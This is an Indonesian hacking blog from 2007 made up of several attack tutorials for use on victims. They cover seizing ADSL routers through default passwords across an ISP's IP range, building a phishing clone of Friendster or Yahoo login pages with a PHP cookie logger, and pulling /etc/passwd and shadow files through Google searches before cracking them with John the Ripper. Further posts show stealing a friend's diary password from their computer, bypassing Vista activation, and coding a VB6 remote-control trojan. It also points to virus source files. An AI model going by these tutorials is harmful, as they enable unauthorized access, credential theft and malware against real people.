| |
| |
Monday, April 2, 2007
Decoding eval gzinflate base64_decode
Sunday, April 1, 2007
Monday, March 26, 2007
Membuat Virus C code
bomber.c (13456)
fuckyou.c (13330)
vir.c (13330)
cvirus.c (12421)
worm.c (5640)
leprosy.c (3174)
cvirus.c (2712)
bill_ted.c (2397)
cvirus21.c (2391)
cvirus21.c (2312)
vlnl03.058 (68)
vlnl03.060 (68)
vlnl03.061 (68)
vlnl03.064 (68)
vlnl03.065 (68)
vlnl03.066 (68)
vlnl03.073 (68)
vlnl03.075 (68)
vlnl03.077 (68)
vlnl03.078 (68)
Mo buat Virus ?? Silakan Baca ditu dulu...
Sapa tau membantu
Link Key : http://www.totallygeek.com/vscdb/
Free SMS di Internet
Coba pake itu.. Register Doloe yaph..
http://www.agentsms.com
Lumayan juga..
Tapi inget, bayar Warnetnya Lebih mahal dari bayar SMSnya.. cuma klo cuma lagi internet bosen
Mo kirim SMS kan bisa.. Hehehehe...
| |
Windows Admin Hacking
allows you to reset the administrator password on Windows 2000/XP.
The ISO Must Be Burned to a CD or Flash drive.
When it is booted, a mini version of linux starts,
which allows the administrator password to be reset.
useful if you need to work on a machine, if the password is unknown.
Download: Code:
http://home.eunet.no/~pnordahl/ntpasswd/cd050303.zip
Turotial for using the above tool: Code:
http://home.eunet.no/~pnordahl/ntpasswd/
LCP 5.04
Password auditing and recovery tool for Windows NT/2000/XP/2003.
Accounts information import: import from local computer, import from remote computer, import from SAM file, import from .LC file, import from .LCS file, import from PwDump file, import from Sniff file.
Passwords recovering by dictionary attack, brute force attack, hybrid of dictionary and brute force attacks.
Brute force session distribution: sessions distribution, sessions combining.
Hashes computing: LM and NT hashes computing by password, LM and NT response computing by password and server challenge.
Download: Code:
http://www.fileedge.com/dynamic/download/19221.exe
Friday, March 23, 2007
Default Password... celah keamanan yang vital
Default Password !!!
Keaman suatu jaringan tentunya jadi perhatian bagi semua orang yang memiliki
akses Jaringan Public[Internet], Banyak dari kita yang tidak menyadari kemanan
Jaringannya terlebih membiarkan Password Default yang terdapat di sebuah perangkat
komunikasi seperti Router maupun Modem di biarkan tetap apa adanya tanpa merubahnya.
Kali ini saya akan membahas bagaimana menjebol sebuah Modem+Router ADSL yang terdapat
di Indonesia dengan menggunakan Password Default perangkat tersebut.
Persiapan dan Tools ;
1.Komputer Anda harus terhubung Internet
2.Tools IP Scanner [superscan v3.0]
3.Range IP target [kali ini saya mencoba dengan range IP ISP Indonet]
4.Range Password Default
-admin
-1234
-password
-12345678
-administrator
-adsl
-network
-[masih banyak lagi, search[at]google]
Langkah Kerja ;
1.Jalankan IP Scanner
2.Konfigurasi tools IP scanner untuk membaca port 80 atau 23
3.Masukan Range IP yang akan di scan
4.Buka dengan browser hasil dari scanner yang port 80 Listen/Terbuka
5.Coba masukan Username dan Password dengan Range Default di atas
6.Jika telah berhasil Modem telah menjadi kekuasaan anda secara Remote
Download
VIDEO TUTORIAL
catatan kecil;
Mohon maaf kepada Provider ISP Indonet khususnya pelanggan Indonet,
Artikel ini sengaja saya berikan,dan artikel ini bukan yang pertama kali
banyak site security community yang telah memberikan artikel semacam ini.
Namun masih saja menjadi keprihatinan sendiri ternyata masih banyak pengguna
ADSL, VSAT, dan lainnya yang membiarkan konfigurasi Passwordnya Default
dari Pabrikan.
Tips dan Trik mencari bug Inclusion dengan Inclusion Scanner
Tips dan Trik
Tools pencari inclusion file
http://forum.milw0rm.com/showthread.php?t=471
inclusion checker/scanner adalah mini tools yang di buat dari bahasa perl
tools ini sangat berguna untuk mencari bug inclusion file[include,include_once,require,require_once]
cara penggunaannya juga sangalah mudah, anda hanya membutuhkan activeperl bagi windows family
dan jalan kan script ini,
Langkah pengecekan atau scanning
1.Siapkan Activeperl[windows]
2.Siapkan Apache+PHP server untuk pengetesan exploit
2.CopyPaste Source Code dari tools ini [source]
3.Siapkan Source Code Aplikasi PHP Webbase yang akan di scan/cek
4.Buat Direktory sembarang untuk menaruh source code aplikasi PHP tersebut
5.Extrak Source Code tersebut di dalam direktory yang telah di siapkan
6.Jalankan Tools nya
7.Isi Direktory yang di minta tools ke direktory yang telah di buat tadi
8.Hasil dari scan di simpan dalam file result.html
9.Buka result.htm dan coba satu per satu hasil dari scan ke dalam bentuk exploit
10.Siap Advisor untuk Public[Jika Ingin]
Download
VIDEO TUTORIAL
nb.
Untuk konfigurasi php.ini di server apache+PHP
register_globals=on
allow_url_fopen=on
Thursday, March 22, 2007
Mengganti Logon Windows
Kemudian buat sebuah Form yang kira2 bentuknya seperti ini :
Kemudian ketikkan kode programnya sebagai berikut :
Lalu buat sebuah Form lagi seperti ini :
Dan kode programnya seperti ini :
Setelah selesai, pastikan program berjalan dengan baik. Untuk memastikannya jalankan Run kemudian isi username dengan ”siapa” (tanpa tanda petik) dan password dengan ”aja” (tanpa tanda petik) dan akan muncul windows explorer dengan folder pertama adalah My Documents.
Ok selanjutnya yang diperlukan adalah mengcompile file tersebut dan membuatnya menjadi file exe, serta menyimpannya di dalam sebuah folder, misalnya C:\Windows\Sistem\logon.exe
Setelah selesai pembuatan software, sekarang kita masuk ke jendela registry. Cari alamat berikut :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon kemudian ubah nilai dari Userinit menjadi C:\Windows\sistem\logon.exe
Untuk sementara ubah registry yang men-disable-kan taskmanager, karena ini perlu untuk pengecekan jika ada kesalahan.
Setelah semua selesai, restart komputer......
Dan sebagai ganti dari logon windows yang biasanya, yang tertampil adalah tampilan form buatan kita. Jangan lupa masukkan password yang telah kita hapal itu.
Nah jika tidak berhasil, tekan Alt+Ctrl+Delete untuk menampilkan taskmanager dan pilih menu file > New Task (Run) ketik explorer.exe lalu Enter. Dan ulangi pembuatan program seperti yang ada di atas.
Dan jika sudah berhasil, silakan untuk mengubah registry yang mematikan taskmanager.
Jika temanmu itu masih menggunakan Software pereset password windows silakan saja, lha wong kita gak make password itu buat logon ke windowsnya... hehehehehe....
Setelah berhari-hari ternyata pemilik komputer itu datang lagi dengan muka sedih...
Ternyata temannya malah menghapus program logon.exe-nya dengan menggunakan software NTFS 4 DOS yang juga ada di CD Hiren. Nah lho......
Pesenku, makanya jangan pelit sama temen.....
Hehehehe....
Peace dan salam penuh damai.....
Monday, March 19, 2007
Fage login sebuah Website
website .. Gw kembali berpikir, apa ini bener bener susah??? Sebab kalau dibuat Tutorial, sebenernya
ini akan menjadi Tutorial paling pendek dalam sejarah SATE (Security Advisory TEam) selama ini ..
Ok ok ..
Mari sekarang kita mulai saja lgsg ..
Tutorial ini bisa diterapkan dalam bentuk page apa saja ..
Well ..
Pertama tama yang kalian perlukan adalah membuka login page dari sebuah website target anda ..
Misalnya friendster / Yahoo .. Tapi sebisa mgkn usahakan jangan membuka dari mainpage nya .. Tapi
bukalah dari page setelah anda gagal login sekali (Biasanya soalnya lebih kecil tampilannya) .. Atau
dari page setelah anda loggout .. (Biasanya cuman dikasih tempat login doank, sedikit gambar, sedikit
link .. Lagipula membantu menghilangkan kecurigaan karena mental ke halaman utama) ..
Tapi semua itu terserah kalian .. Hehehe ..
Imajinasi sendiri dan berpikir setahap diatas orang lain, dan sedemikian rupa membuat jebakan yang
bisa membuat orang percaya dan membukanya, adalah seni dari 'ngiseng ala SATE' itu sendiri ..
Pertama tama bukalah HTML code daripada web itu sendiri ..
Setiap login page (Terutama yang PHP), pasti memiliki php code yang bertujuan untuk melakukan
login data dari client dan di compare .. Biasanya namanya Login.php .. Nah .. Anda cuman perlu
membuat sebuah login.php baru dengan code modifikasi dari bawah ini:CODE
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
Modif-lah untuk melakukan logging username and password .. ^^
Atau cari saja di google .. Hehehe ..
Lalu ubahkan alamat login.php pada script asli .. Yang biasanya adalah LocalCODE
/Login.php/
Menjadi Remote ke website anda, misal:CODE
http://www.example.com/Login.php
Begitu juga dengan gambar2 dan link2 ..
Biasanya mereka melakukan setting mencari file dari local address / directory, yang kebanyakan format
codenya adalah, sbb:CODE
/images/
Ubahlah menjadi alamat lengkap web itu ..
Misalnya Friendster.comCODE
http://www.friendster.com/images/
Tidak sulit bukan??
Lalu simpanlah dalam *.html baru anda ..
Dan host kan di hosting anda ..
Thursday, March 15, 2007
Cara Mengcrack Windows Vista Final Release
Menurut Microsoft Bahwa Windows Vista andalanya susah di jebol atau di Crack.padahal hal itu tidak bisa di benarkan 100%.
Saya akan memberitahukan caranya Mengrack Windows Vista Final Release.Tahapannya sebagai berikut:
1. klik bendera windows|Klik Run|dan ketik Cmd.
2. setelah Muncul command prompt ketikan slmgr.vbs -dlv lalu tekan enter.fungsi dari perintah slmgr.vbs -dlv adalah untuk memeriksa Apakah Komponen Dari Windows untuk mengaktifkan Vistanya Berjalan.
3. klik bendera windows|klik Run|dan ketik Services.msc,Cari software Licensing,dan pilih Disable di startup type.setelah itu Cari Ui Notification dan pilih Disable di startup type.setelah selesai klik close.
4. klik bendera windows|Klik Run|dan ketik Cmd|ketikan slmgr.vbs -dlv lalu tekan enter. Setelah software licensing di disable dan juga UI notification, maka Komponen Windows Untuk Menjalankan Slsvc.exe Akan tidak jalan.
Catatanp:
setelah Melakukan tahapan di atas yang perlu anda perhatikan adalah:
1.Anda tidak bisa Menjalankan Control Panel 2.Anda tidak bisa Menjalankan Properties kalau di klik kanan di desktop.
3.Anda tidak bisa Menjalankan Properties kalau di klik kanan di My Computer.
Tetapi jangan khawatir karena anda masih bisa menginstall Program baru. dan semua aplikasi windows seperti Windows Media player,dan lain-lain. masih bisa di jalankan.
Thursday, March 8, 2007
Menyembunyikan Tombol Start, Icon Desktop, Systray Icon, Taskbar Clock dan Taskbar dengan VB6.0
Dari judulnya.. Udah jelas khan kita mau ngapain??
Langkah 1.
Okay, Buka Microsoft Visual Basic 6.0 Anda. Pada kotak dialog yang muncul, pilih Standard EXE lalu klik [Open]
Langkah 2.
Buatlah 6 buah Button pada Form anda. Susun seperti gambar berikut:
Atur juga Properties Form-nya:
Langkah 3.
Buatlah sebuah modul baru. Klik menu [Project] kemudian pilih [Add Module]. Akan tampil sebuah kotak dialog. Klik Module, kemudian klik [Open]. Copy-Paste Modul berikut:
Langkah 4.
Klik Form anda. Kemudian klik menu [View] lalu pilih [Code]. Copy-Paste Code berikut:
Langkah 5.
Simpan hasil pekerjaan anda. Klik File --> Save Project. Kini jalankan Program anda, tekan tombol [F5] pada keyboard anda. Kurang lebih hasilnya demikian:
Selamat mencoba.. bisa dipadukan dengan Virus buatan anda atau.. hehehe.. terserah anda laah.. ;)
Cheating Game with Memhack.exe
Atas dasar itulah sebuah program bernama memhack.exe diciptakan. Software keluaran Jerman ini bisa dijadikan alat bantu untuk mencurangi game anda. Misalnya dalam game peperangan, dengan tool ini kita bisa membuat tokoh yang kita mainkan menjadi kebal, memiliki peluru tak terbatas serta mencegah Game Over. Ugh.. menyenangkan bukan?? Dengan tool ini, aktivitas nge-Game jadi menyenangkan ;)
Sekarang download MemHack dari Halaman Member WWW.SPYROZONE.TK. Persiapkan juga game yang akan di cheat. Setelah semuanya siap, ikuti langkah-langkah berikut:
Langkah 1.
Jalankan Game anda. Sebagai contoh, disini saya menggunakan game Super mario XP.
Langkah 2.
Jalankan Memhack.exe, saat ada kotak popup yang menanyakan Bahasa Apa yang ingin anda gunakan, pilih saja English. Tampilan Memhack akan terbuka.
Langkah 3.
Beralih pada Game. Kita lihat berapa jumlah Live Super Mario. Dari indikator Live bisa kita saksikan Bahwa Super Mario memiliki sisa Live sebanyak 5. Kini beralihlah pada MemHack. Pada form Act.Lives, isikan angka sisa hidup si Mario, yaitu 5.
Langkah 4.
Beralih pada Game. Jalankan Super Mario. Saat bertemu dengan Musuh, jangan menghindar. Biarkan Si Mario diserang agar indikator live-nya berkurang (berubah). Sekarang, lihat berapa sisa hidup Si Mario. Kembali Ke Memhack, isikan sisa hidup si Mario pada form Act.Lives Karena tadi sisa Live-nya berkurang, tersisa 2, maka isikan 2, lalu klik [Sieve]. Pada contoh game ini, hasil pencarian pada kolom yang saya langsung tersisa satu. Jika pada Game yang anda gunakan masih terdisplay banyak hasil pencarian, ulangi langkah diatas. Jadi pada intinya kita sengaja membuat Value Live kita berkurang. Jika telah tersissa antara 1-3, maka itu adalah titik aman bagi anda.
Langkah 5.
Klik tombol [Use The Hits]. Sebuah kotak dialog akan tampil. Pada Beschreibung, ketik: Live lalu pada Wert, isikan berapa banyak kehidupan yang anda inginkan untuk tokoh yang anda mainkan. Nantinya angka itu akan menjadi angka "beku", dalam artian walaupun anda diserang oleh musuh, kehidupan yang anda miliki tidak akan berkurang. Disini saya isikan 20. jadi nantinya Si Mario akan punya Kehidupan Maksimum. Klik [OK] sesudahnya.
Langkah 6.
Aktifkan hasil modofikasi anda. Pada Kolom Freeze di kotak daftar pada kolom bawah program, klik status Off sehingga berubah menjadi ON. Klik juga tombol [Freezer is Off] sehingga berubah menjadi [Freezer is on]
Langkah 7.
Sekarang kembalilah pada game anda. Lihat indikator Live anda. Ketika bertemu musuh, jangan menghindar, biarkan musuh menyerang anda. Lihat indikator Live anda, jika berhasil, tentunya kini Value pada indikator Live anda telah "Beku" menjadi maksimum (lihat gambar dibawah) atau sesuai dengan angka yang anda masukkan pada kolom wert tadi. Kini anda tidak perlu lagi menghadapi musuh karena berapa kalipun musuh menyerang, anda tidak akan pernah mati.. hehehe.. ;)
Nah, dengan sedikit eksplorasi pada program ini, anda bisa melakukan banyak hal curang lainnya. Tools ini tidak tergantung pada game tertentu, coba saja pada game-game kesayangan anda. Namun.. yeah, tentu saja tidak berlaku untuk semua game, adakalanya beberapa game gagal di Cheat menggunakan Tool ini ;)
Monday, March 5, 2007
Koneksi PC ke HP
Sunday, March 4, 2007
Cracking Password Dengan John The Ripper
---------------------
John The Ripper?? Siapa sich yang nggak kenal dengan tools Cracking yang
kaya fitur ini.. ;) Walaupun usianya sudah uzur, tapi kemampuannya tetap
bisa diandalkan. Mungkin tutorialnya dah lama yach.. sorry nich, kebetulan
lagi banyak yang request, so bagi yang udah bosan dengan tutorial yang berbau
John The Ripper.. ngapain juga masih baca sampai baris ini!! ;P
::---||-[2]. Mencari Target
----------------------------
Sekarang kita akan mencari target. Biasa.. kita mampir ke rumahnya paman
Google (google.com). Ketik keyword berikut lalu klik tombol search:
Inurl:/etc/passwd/
Eits.. tunggu dulu.. maksudnya apaan nich?? Okay, gue jelasin yach ....
Untuk melakukan password cracking, kita khan harus tau dimana file password
yang mau di-crack. Naah, target kita kali ini adalah sistem operasi Linux.
Pada OS Linux, file passwordnya berada di lokasi /etc/passwd. Sedangkan
shadow passwordnya berada di /etc/shadow (baca arsip lama mengenai Shadow
Password ). Dengan bantuan paman google, kita berusaha mencari file password
dengan cara mengetikkan keyword diatas.
Well.. gimana nich hasil pencariannya? pasti muncul banyak khan.. ;) Klik
salah satu link, dan isi file /etc/passwd akan ditampilkan. oleh browser. Copy
- pastekan isi file tersebut pada notepad dan simpan dengan nama password.txt.
Sekarang, kita akan melihat isi file shadow passwordnya.Misalkan url situs
korban yang anda buka tadi adalah:
http://www.spyrozone.tk/spyrokid/config/etc/passwd-
Ubahlah alamat itu pada address bar menjadi:
http://www.spyrozone.tk/spyrokid/config/etc/shadow-
Naah, kini isi dari file etc/shadow akan ditampilkan oleh browser. Copy -
paste isi file tersebut pada notepad, lalu simpan dengan nama shadow.txt.
::--||-[3]. Password Cracking
-----------------------------
Eh, udah punya John The Ripper belum?? Kalau belum, kamu bisa download
John The Ripper di member area www.spyrozone.tk. Kalau sudah, saatnya kita
melakukan password craCKING!
Extract file hasil downloadnya ke suatu folder lalu buka lewat MSDOS. Biar
gampang,copy juga file password.txt dan shadow.txt tadi ke directory yang sama
dengan John The Ripper. Setelah itu, gabungkan file password.txt dan file
shadow.txt dengan menggunakan program unshadow.exe milik John The Ripper.
Perintahnya ialah:
unshadow password.txt shadow.txt >> crack.txt
Setelah itu, kita gunakan john-mmx.exe untuk mengCRACK file crack.txt
dengan menggunakan perintah:
john-mmx crack.txt
Tunggu dech.. lamanya hasil crack yang keluar tergantung dari seberapa
panjang password korban dan seberapa rumit karakter (special characters) yang
digunakan dalam password. Jika proses cracking berhasil, akan muncul:
username (password)
Membuat Database Oracle
Manajer IT baru mengadakan rapat dengan beberapa orang user yang akan menggunakan system baru yang anda buat (anda sebagai seorang DBA baru). Mereka ingin memakai database kedua untuk menyimpan data histori. Dengan menggunakan Database Configuration Assistant anda akan membuat database dengan menggunakan template General Purpose dengan ketentuan sebagai berikut :
-
Set global database name dengan nama hist.oracle.com dan SID dengan hist
-
Set password = oracle
-
Untuk storage options, gunakan File System
-
Gunakan Flash Recovery area, gunakan ukuran (size) dan lokasi (location) sesuai default, dan disable backups.
Setelah anda selesai membuat database, user memutuskan bahwa mereka tidak perlu lagi memakai database histori, sehingga anda harus menghapus database hist yang baru dibuat.
Langkah-langkah yang dikerjakan :
-
Jalankan Database Configuration Asisstant
-
Klik Next pada Welcome page
-
Pilih Create Database pada Operations page, lalu klik Next
-
Pilih General Purpose pada Database Template page, kemudian klik Next
-
Pada Database Identification page, gunakan hist.oracle.com untuk nama global database. Dan SID = hist, lalu klik Next
-
Pada Management Options page, pastikan untuk mengkonfigurasi database dengan pilihan Enterprise Manager dan gunakan Database Control untuk Database Management. Jangan memilih pilihan lain, lalu klik Next.
-
Pada Database Credentials page, pilih Use the Same Password for All Accounts. Kemudian masukkan oracle sebagai password, lalu klik Next.
-
Pada Storage Options page, pilih File System, lalu klik Next.
-
Pada Database File Locations page, pilih “Use Common Location for All database files” masukkan /…/oracle/oradata sebagai lokasi, lalu klik Next.
-
Pada Recovery Configuration page, pilih Specify Flash Recovery Area, kemudian gunakan location dan size default. Jangan meng-enable archiving. Lalu klik Next.
-
Pada Database Content page, pilih Sample Schemas, lalu klik Next.
-
Pada Initialization Parameters page, gunakan nilai default, lalu klik Next.
-
Pada Database Storage page, klik Next.
-
Pada Create Options page, pastikan untuk memilih Create Database, lalu klik Finish.
-
Pada Confirmation page, review detail dari setting yang sudah dilakukan, lalu klik OK. Jika ada yang masih salah, klik Cancel dan gunakan tombol back untuk pembetulan.
-
Pada akhir dari pembuatan database, muncul window untuk memasukkan password Management. Klik Password Management dan unlock user HR, kemudian berikan password HR pada user HR. Klik OK dua kali kemudian Exit
-
Untuk menghapus database, gunakan Database Configuration Assistant. Klik Next pada Welcome page
-
Pilih Delete a Database, lalu klik Next.
-
Pilih database hist pada list.
-
Klik Finish
-
Klik Yes untuk konfirmasi.
-
Jika sudah selesai, klik No jika tidak ingin mengerjakan hal lain.
/* ------------------------------|EOF|------------------------------ */
Mendapatkan Password Dan Membaca Diary Pengguna "My Electronic Diary"
Setiap orang pasti punya rahasia, kenangan dan masalah dalam hidup. Nah, Diary bisa jadi "Korban" untuk menumpahkan itu semua supaya beban hidup menjadi sedikit ringan ;) Dan kita.. hehehe.. kita selalu pengen doong mengetahui rahasia orang lain hehehe... ;P
Ini nich salah satu Diary Electronic yang mulai banyak digunakan belakangan ini. "My Electronic Diary" dari caberawit.com. Sebelum kita masuk pada inti pembahasan. akan saya berikan sedikit panduan penggunaannya:
-
Download programnya di Member Area kategori Just 4 Fun!. Extractlah file zip nya di tempat yang (menurut anda) aman. Klik ganda File True Story.exe File tersebut boleh anda rename sesuka hati.
-
Klik tombol Buka lalu klik tombol Klik disini untuk login.
-
Isikan nama, alamat email dan password yang nantinya akan digunakan untuk mengakses diary tersebut lalu klik isi DIARY.
-
Nah, kini anda bisa mengisi cerita-cerita anda.. klik SIMPAN sesudahnya ;)
Nah, jika nantinya ada orang lain (entah teman atau saudara anda) yang membuka diary tersebut, My Electronic Diary akan meminta Password untuk bisa mengaksesnya sehingga rahasia anda akan tetap terjaga dengan aman.
Eh, bener nich aman?? hehehe...... ya nggak laah... ;p nggak ada laah yang 100% aman ;p
Jika teman/saudara anda ternyata juga pengguna My Electronic Diary, anda bisa loch mendapatkan Password mereka. Anda juga bisa mendapatkan catatan Diary mereka.. hehehe.. ;) Gini nich caranya.... gampang banget kok..
-
Pertama-tama, datangi komputer korban. Bilang ajah.. "Eh, gue pinjem komputernya doong.." lalu alihkan perhatiannya atau tunggu sampai dia lengah ;)
-
Tekan kombinasi tombol keyboard
+ [F] untuk menampilkan jendela SEARCH. Pilih opsi All Files and Folders.
-
Pada isian keyword, ketik:
profileD.sol
Klik Search.
-
Pada hasil pencarian yang muncul di sebelah kanan anda, klik kanan file tersebut lalu pilih Open Containing Folder.
Akan terbuka directory tempat file tersebut tersimpan. Copy seluruh file dan folder yang berada pada directory itu ke Flashdisk anda lalu pulanglah dengan tenang ;)
Di rumah.. jelajahi file-file tadi tadi dengan notepad atau text editor kesayangan anda. Salah satu file special disini adalah file yang bernama profileD.sol. File tersebut adalah file yang berisi informasi Username, Alamat email dan Password korban ;) Biasanya.. password itu nggak jauh-jauh dari password email korban huehuehue... Bener loch, saya pernah mendapatkan password My Electronic Diary teman saya dengan cara ini, setelah saya coba buka emailnya dengan password yang sama, ternyata password emailnya sama dengan yang digunakan pada My Electronic Diary miliknya ;p
Dari file diatas, kita bisa mengetahui bahwa ternyata sang korban menggunakan nama spyro kid, alamat emailnya spyro_zone@yahoo.com dan passwordnya ialah spyrozone.tk
File-file lain yang berada di subdirecories berisi catatan diary sang korban. Berikut contohnya:
Okay, selamat mencoba dan selamat mencari korban.. ;p
Mengerjai sang Penyusup (Shutdown)
Menjadi penyusup memang menyenangkan. Tapi segalanya akan jadi menjengkelkan tatkala kita dalam posisi korban/sang admin. Ini hanya salah satu alternatif untuk menjahili sang penyusup. Kita akan mematikan komputernya jarak jauh ;) Tak perlu repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan windows. Mengenai bagaimana cara mendeteksi sang penyusup, baca artikel terdahulu.
-
Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd
-
Pada command prompt, ketik: shutdown -i lalu tekan Enter.
-
Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan screenshoot berikut:
-
Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe... ;)
-
Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini:
Hohoho... menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah sang penyusup?? tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas?? Tenang, saya ada sedikit tips.. ;)
-
Saat anda melihat kotak dialog peringatan bahwa komputer anda akn segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!!
Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!! ;) -
Saat "waktu eksekusi" menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya ;p
-
Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:
Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe... ;)
Lalu apa yang akan dilakukan sang Admin?? Tentu kondisi ini tidak bisa didiamkan. Jangan biarkan sang Penyusup senyum-senyum sendiri. Andalah sebagai admin yang harus tersenyum :) Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang penyusup akan langsung shutdown tanpa konfirmasi ;)
Sekian... and Happy SHUTTING DOWN!!! ^_^
Trojan Horse
INTRO
Ada yang udah tau mengenai Trojan Horse sebelumnya? Pasti udah tau donk!! Yang belum tau (Kasiaaaaan….dech…lo….) silahkan cari artikel mengenai Trojan Horse pada media-media lain (Koran, ilmukomputer.com, jasakom, dll). Soalnya untuk jelasin Trojan Horse Perlu satu halaman lebih…CUUUAAAAPPPEEEKKK….!!!
Ok dech langsung aza…!!!
Pada pembuatan Trojan Horse ini (TH) ada beberapa step yang perlu kita perhatikan antara lain:
-
Tahap Persiapan
-
Tahap Pengerjaan
a). Client
è Interface
è Coding : Conection, Half-Execution, Error Handler, dll..+ debug
b). Server
è Coding : Open Gate, Execution, Stealth, dll.
3. Tahap Akhir
Sekarang marilah kita mulai untuk membuat proyek kita ini. Disarankan sebelum kita memulai untuk melaksanakan suatu pekerjaan ada baiknya kita berdoa terlebih dahulu agar apapun yang kita kerjakan mendapat berkah dari Tuhan YME. Amin…..!!!!!!
1. TAHAP PERSIAPAN
Pada tahap ini yang pertama harus kita lakukan adalah membuka aplikasi Visual Basic. Setelah itu pada jendela New Project pilih Standard EXE seperti pada gambar.
Setelah itu akan tampil satu form kosong, dan tampilan default lainya.
Untuk membuat proyek ini kita tidak bisa menggunakan tools (control) sederhana yang ditampilkan pada Toolbox. Kita memerlukan satu control tambahan yang harus kita load ke dalam Toolbar/Toolbox. Control yang kita maksud disini adalah MS WINSOCK control.
Untuk mengaktikan (memanggil) control ini kita pilih Project > Components pada Menubar. Maka akan tampil jendela component seperti pada gambar:
Lalu kita pilih Microsoft Winsock Control 6.0 dengan memberi tanda centang pada checkbox disisi kirinya (spt pada gbr). Maka pada toolbar akan tampil satu control tambahan ber-icon dua computer yang terhubung oleh garis merah seperti pada gambar berikut.
Gambar ini menandakan bahwa ms winsock control berhasil kita load ke dalam toolbar dan siap di gunakan.
Dengan tampilnya icon contol tersebut berarti persiapan kita untuk membuat proyek ini telah selesai. Maka kita akan lanjutkan ketahap berikutnya. Yaitu tahap pengerjaan.
2. TAHAP PENGERJAAN
Seperti yang sudah kita ketahui sebelumnya, umumnya program TH terdiri dari dua unit program yaitu : CLIENT dan SERVER. Saya akan coba jelaskan sedikit maksud dari kedua program ini.
Program CLIENT ialah program yang akan kita gunakan sebagai sarana pengendali (remote) dari program SERVER. Dengan kata lain program ini lah yang akan kita gunakan untuk mengeksekusi computer korban (victim) dengan bantuan SERVER yang ditanamkan pada victim.
Sedangkan program SERVER ialah program yang akan kita tanamkan pada victim dengan tujuan mengeksekusi victim itu sendiri berdasarkan instruksi yang dikirimkan oleh program CLIENT. Bingung??!!!...Sukuriiinnn…!!!!
Okey..marilah kita mulai tahap ini dengan membuat program CLIENT terlebih dahulu. Kenapa?? Karena untuk membuat program ini tidaklah terlalu sulit. OK..marilah…ehm…
Program CLIENT
Pada program ini kita akan membuat dua “Fun Menu” yaitu : Open/Close CD ROM dan Send Message.
Sekilas Info:
Sebenarnya masih banyak “Fun Menu” lain yang dapat kita tambahkan, tapi pada pembahasan kali ini kita persingkat saja karena akan memakan banyak halaman untuk menjelaskannya. Oleh karena itu pembahasan “Fun Menu” lebih lanjut akan saya buat pada artikel selanjutnya (“Membuat TH dengan VB6 seri 2). Untuk release artikel ke-2, tergantung dari banyaknya respon yang mendukung yang saya terima melalui e-mail di xpartacvs@gmail.com
Interface
Dalam hal ini yang kita perlukan ialah 5 command button, 2 textbox, 1 label, dan 1 winsock control. Atur sedemikian rupa sesuai selera anda pada form.
rename tiap nama control menjadi seperti dibawah ini :
Command1 - cmdConnect Label1 - lblStatus
Command2 - cmdDisconnect Text1 - txtIP
Command3 - cmdOpen Text2 - txtMsg
Command4 - cmdClose Winsock1 - tcpClient
Command5 - cmdMsg
Jangan lupa Caption dan Text pada control.
Coding
Ok saatnya coding…..
Klik ganda pada tombol Connect, lalu masukan code berikut pada jendela code:
Private Sub cmdConnect_Click()
On Error Resume Next
cmdConnect.Enabled = False
lblStatus.Caption = "Connecting..”
If txtIP.Text = "" or Then
MsgBox "Please enter a valid IP adress", vbCritical
End If
tcpClient.Connect txtIP.Text, 6666
End Sub
Maksud dari script diatas ialah:
computer akan mematikan tombol connect. Lalu computer akan memberikan keterangan “connecting….” pada label status untuk memberikan keterangan pada anda bahwa saat ini anda sedang berusaha untuk melakukan koneksi ke computer Korban. Setelah itu computer akan mengecek apakan anda sudah mengisi IP Address atau belum. Jika belum maka akan tampil msgbox jika sudah maka computer akan mencoba koneksi ke nomor IP yang anda masukan pada txtIP dengan nomor port 6666 (nomor port bisa diisi berapa saja, umumnya terdiri dari empat digit).
Peringatan :
Perhatikan dan ingat nomor port yang anda masukan, karena akan kita gunakan untuk program SERVER.
Klik ganda pada tombol disconnect dan masukan code berikut:
Private Sub cmdDisconnect_Click()
On Error Resume Next
LblStatus.Caption = “Not Connected”
cmdDisconnect.Enabled = False
cmdConnect.Enabled = True
tcpClient.Close
End Sub
Maksud dari script diatas ialah:
Computer akan memberi keterangan “Not Connected” pada label status untuk menginformasikan bahwa tidak ada koneksi yang sedang berjalan saat ini. Lalu Komputer akan mematikan tombol Disconnect dan menghidupkan kembali tombol Connect. Lalu computer akan memutuskan hubungan dengan Server.
